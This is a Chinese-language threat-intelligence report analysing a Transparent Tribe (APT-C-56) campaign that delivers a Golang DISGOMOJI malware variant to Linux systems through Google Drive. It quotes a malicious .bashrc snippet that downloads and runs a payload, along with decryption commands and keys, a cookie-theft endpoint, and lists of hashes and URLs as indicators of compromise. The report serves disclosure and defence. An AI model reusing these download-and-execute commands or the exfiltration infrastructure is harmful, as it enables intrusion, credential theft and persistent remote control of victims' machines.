APT-C-56(#透明部落)(即Transparent Tribe),又称APT36、ProjectM或C-Major,是一家源自南亚的高级持续性威胁(APT)组织。该组织的主要攻击区域集中于印度及其周边国家,以精通社会工程学为基础,擅长实施针对性极强的鱼叉式网络攻击。其具备多样化的攻击载荷能力和跨平台攻击技术,开发了专用于Windows系统的CrimsonRAT木马,以及在Linux系统上利用波塞冬(Poseidon)组件的攻击工具。
近日360高级威胁研究院捕获到了一起透明部落组织使用#DISGOMOJI 恶意软件变体的攻击活动,该软件是基于Golang编写的ELF可执行程序,其借助谷歌云端硬盘(Google Drive)进行下发,并且数据回传到谷歌云服务(Google Cloud Platform),此外还会下载浏览器窃密插件和远程管理工具以实现进一步的窃密行动和远程控制。鉴于这类分发方式在以前的攻击活动中比较少见,这里进行分析说明以免用户中招。
一、攻击活动分析
1.攻击流程分析
本次攻击中,APT-C-56组织诱导用户执行名为password的文件,执行后该文件会显示诱饵文档的密码,同时从谷歌云端硬盘下载解密器ec、数据文件x96coreinfo.txt和一个jar文件,解密器解密x96coreinfo.txt为elf文件,为了防止下载失败,还会执行jar文件,jar文件的作用是下载解密器和intermediate.txt,解密后的可执行程序intermediate会创建持久化下载x96coreinfo.txt并解密执行。最后的可执行程序x96coreinfo文件实际为DISGOMOJI恶意软件的变体,执行时会与谷歌云服务通信并上传数据,同时还会下载浏览器窃密插件和MeshAgent远程管理工具。整个攻击流程如下图所示:
2.恶意载荷分析
捕获的恶意样本如下所示:
MD5 |
452cd18570471e80dd6bf34addede334 |
文件名称 |
Protected_Document.zip |
文件大小 |
2.31 MB (2,425,594 字节) |
文件类型 |
ZIP |
Protected_Document.zip”的压缩包文件,里面包含一个名为“Developing Leadership for Future Wars .pdf”的加密PDF文件和名为“Password”的ELF文件,目的就是诱导用户运行Password文件解密PDF,解密后的PDF文件为本次攻击活动使用的伪装内容。ELF文件主要功能是下载下一阶段的攻击载荷。
“Password”文件是一个Golang编译的ELF文件,具体信息如下:
MD5 |
d5a3766e744a563278b18267d6bd7113 |
文件名称 |
Password |
文件大小 |
5.52 MB (5,796,976 字节) |
文件类型 |
ELF |
用户输出密码后,PDF伪装内容如下:
然后,攻击者将下列配置信息写入“.bashrc”配置文件中。其功能是从特定的GoogleDrive公共地址下载后续载荷到“$HOME/.config/x96-dependencies.jar”,然后利用自带的java命令执行“x96-dependencies.jar”。
\nif [ ! -f "%s" ]; then\ncurl -L -o "https://drive.google.com/uc?export=download&id=1ZreMbUude-F2zLWWeO2FNiKU7I7v7aSe" "$HOME/.config/x96-dependencies.jar" >/dev/null 2>&1\ncd \"$HOME\"\nif ! pgrep -x \"x96coreinfo\" >/dev/null; then\nnohup sh -c 'cd \"$HOME/.config\" && sudo java -jar %s > /de |
接着,继续将如下的配置信息写入“.bashrc”配置文件中,本次配置信息的功能是从GoogleDrive公共地址分别下载“x96coreinfo”和“ec”文件,ec是一个ELF文件,然后执行“./ec -f x96coreinfo -d -k 'TedtempNahihy!'”命令,最后执行“x96coreinfo”程序。
为了防止配置文件中脚本下载失败,“Password”主程序仍会下载“x96coreinfo”和“ec”文件,并执行“./ec -f x96coreinfo -d -k 'TedtempNahihy!'”命令。但是我们发现无法使用“TedtempNahihy!”密钥进行解密,我们猜测可能攻击者中途更换加密文件,或者使用了错误的加密过的文件,从而无法解密,但是通过写入的“.bashrc”配置命令下载jar后续载荷中,会使用正确密钥进行解密。
最后,通过执行“bash -i -c 'source ~/.bashrc'”使保存在“.bashrc”配置文件中的别名生效。并将该命令写入定时任务。以实现持久化驻留。
“x96-dependencies.jar”是个java归档文件,通过“java -jar”命令执行,具体信息如下:
MD5 |
43e4260c595b20e357be75c0c1fbec29 |
文件名称 |
x96-dependencies.jar |
文件大小 |
1.91 KB (1,957 字节) |
文件类型 |
JAR |
经过分析,从远端下载的“intermediate”是一个经过加密处理的文件,“ec”文件是一个用于解密“intermediate”的ELF可执行文件。“ec”文件是一个Golang编译的ELF文件,具体信息如下:
MD5 |
c763ecf315481525afcd47c5f32c1fd7 |
文件名称 |
ec |
文件大小 |
1.91 MB (2,012,048 字节) |
文件类型 |
ELF |
“intermediate”是一个Golang编译的ELF文件,部分功能和“Password”相同。“intermediate”文件信息如下:
MD5 |
d24c797f94933a3ec5227a6f57e15358 |
文件名称 |
intermediate |
文件大小 |
5.86 MB (6,151,759 字节) |
文件类型 |
ELF |
-f x96coreinfo -d -k 'Kavach0fficialDB'”命令解密“x96coreinfo”文件。和之前解密“x96coreinfo”文件的秘钥(TedtempNahihy!)不同,本次使用的秘钥(Kavach0fficialDB)能成功解密“x96coreinfo”文件。
通过服务的方式进行持久化驻留。通过层层的下载,解密,持久化驻留,并且在多个组件中都在下载解密操作,展现出整个攻击链较高的容错率。
3.攻击组件分析
x96coreinfo是本次攻击所使用的最终的载荷,具体信息如下:
MD5 |
c8c21b4642f12c28f6e5e0389bbf8c36 |
文件名称 |
x96coreinfo |
文件大小 |
16.6 MB (17,472,457 字节) |
文件类型 |
ELF |
首先,x96coreinfo会获取局域网IP,广域网IP以及MAC地址等信息,系统标志等信息发送给GCP。随后接收并解密返回的命令并执行。
接着,x96coreinfo使用开源项目“firefox_decrypt”来获取Firefox相关产品的密码,并将获取到的密码文件上传到攻击者控制的谷歌云平台。
然后窃取当前工作目录下后缀为“.doc”,“.docx”,“.pdf”“.xls”,“.xlsx”,“.ppt”,“.pptx”,“.jpg”,“.jpeg”,“.png”,“.odt”,“.ods”,“.odp”文件,然后也用同样的方式上传到谷歌云平台。
除此之外,攻击者还将存放在远程链接上的“firefox_portable.zip”保存到/opt/firefox.zip。
下载的zip是伪装firefox的安装包(md5:2d9fb9303512a6b6e9a67c4d956a0e07),其具备正常的firefox功能。只是在安装包firefox_portable\firefox\Extension对应扩展目录中加载了一个恶意background.js,其正常的firefox安装包默认没有这个js文件。
其具体功能是监控受害者是否访问带有https://email.gov.in等字符串的网站,如果是,则盗取uuid以及cookies至http://46.202.153.236/cookies-handler.php。
此后,攻击者还会通过执行位于远程地址(saadac3.accesscam.org)上的MeshAgent脚本安装MeshAgent远程设备管理器,以便长期控制受害者。
需要特别说明的是:除了本次攻击链中所使用的名为“x96coreinfo”的攻击载荷,我们还关联到了名为“x56coreinfo”攻击载荷,该文件和“x96coreinfo”相比,功能大体一致,只是没有添加函数名混淆。也体现了攻击者在努力地更新自己的武器库。
二、归属研判
通过对本次攻击活动的相关信息进行深入分析,我们认为此类攻击活动符合透明部落组织以往的TTP,具体表现有以下方面: 1、使用谷歌云端硬盘下载后续载荷[1],这样通信具备隐蔽性,并且无需自建C2服务器,降低成本和暴露风险;
2、下载DISGOMOJI变体功能与之前发现的载荷也比较类似,只是之前的DISGOMOJI使用的是Discord服务器,而本次使用的是谷歌云服务进行通信,此外,在载荷混淆方式上进行了升级;
3、载荷存放目录命名上跟之前攻击活动中也较类似,具体如下:
本次目录 |
$HOME/.x96_32-linux-gnu/ |
之前目录 |
$HOME/.x86_32-linux-gnu/ |
本次披露样本与之前披露样本属于同类型样本,但是样本与之前有所差异,是未被披露过的相关样本。该类型样本结构相对复杂,载荷更新也较快,需要引起足够的重视。
由于边界、文化、民族及历史等因素,印巴之间的冲突长期存在,地缘矛盾引发的军事与政治情报刺探活动频发,因此该地区的APT组织攻击行为尤为活跃。透明部落主要以印度军方人员及政府官员为目标,实施精准的定向攻击。本次攻击诱导受害者执行password打开加密的pdf文档,显示密码的同时会静默下载解密出DISGOMOJI变体木马程序,本次变体采用了与谷歌云服务的通信方式而不是之前版本与Discord通信的方式,并且函数名进行了混淆,这表明该组织在持续地进行更新恶意代码形态。由于Linux系统在印度政府中被广泛使用,相信该组织后续会针对Linux系统开发出更多的攻击武器。
因此在这里提醒用户加强安全意识,无论何种操作系统,切勿执行未知样本或点击来历不明的链接等操作。这些行为可能导致系统在没有任何防范的情况下被攻陷,从而导致机密文件和重要情报的泄漏。
MD5:
452cd18570471e80dd6bf34addede334
d5a3766e744a563278b18267d6bd7113
c763ecf315481525afcd47c5f32c1fd7
68fbe197c62a3777d2299f9eabed2c70
43e4260c595b20e357be75c0c1fbec29
d24c797f94933a3ec5227a6f57e15358
c8c21b4642f12c28f6e5e0389bbf8c36
e429ebfbc827ac8a865dce20470d3e8b
fe7bb6d0835879043e4b9fef7fa59375
1a17955be2f99813c03d9f49701315932d9fb9303512a6b6e9a67c4d956a0e07
C2&URL:
https://drive.google[.]com/uc?export=download&id=1ZreMbUude-F2zLWWeO2FNiKU7I7v7aSe
https://drive.google[.]com/uc?export=download&id=1Mjb0yaFvUTREFAFKaPYpaJdrMHso_Fp-
https://drive.google[.]com/uc?export=download&id=1pTsXCIZByamTPV9qVdaYRVv87o0nf0mL
https://drive.google[.]com/uc?export=download&id=1s8VJ_ix5k-hSPwAiWYJMd6TrClWYtZQI
https://drive.google[.]com/uc?export=download&id=1hXrn-AQlVEPeNHkjLDw-Cj6uuZ1sNiwr
https://drive.usercontent.google[.]com/download?id=1iYpTG9y_J2BuUTiIMtn0BMHgYU3Zrm6n
https://drive.google[.]com/uc?export=download&id=1MZqE1kIo6Q5eI2CQ0o8dGWHxGVIzzBM4
https://drive.google[.]com/uc?export=download&id=1KK45pYzBF5CF6hO_iw0MMMPZUEIy4fR7
https://saadac3.accesscam[.]org/meshagents?id=JEV2YwGY8a5qG5mKayrgQgvzlPXkeCeYbGDYA2Nkwch8VIoaRSQtV3CbSsHBfnB4&installfl
https://saadac2.mywire[.]org/meshagents?script=1
https://drive.usercontent.google[.]com/download?id=1TqPzjwvRirB5U_V9NNjhpYC53hYtd4qu&export=download&authuser=0&confirm=t&uuid=cd9cfd85-7c03-477a-9fb0-4ad21f57&at=AEz70l609I4DMbUNVtlLPPytmQA-%3A1742974814202
http://46.202.153[.]236/cookies-handler.php
[1]https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论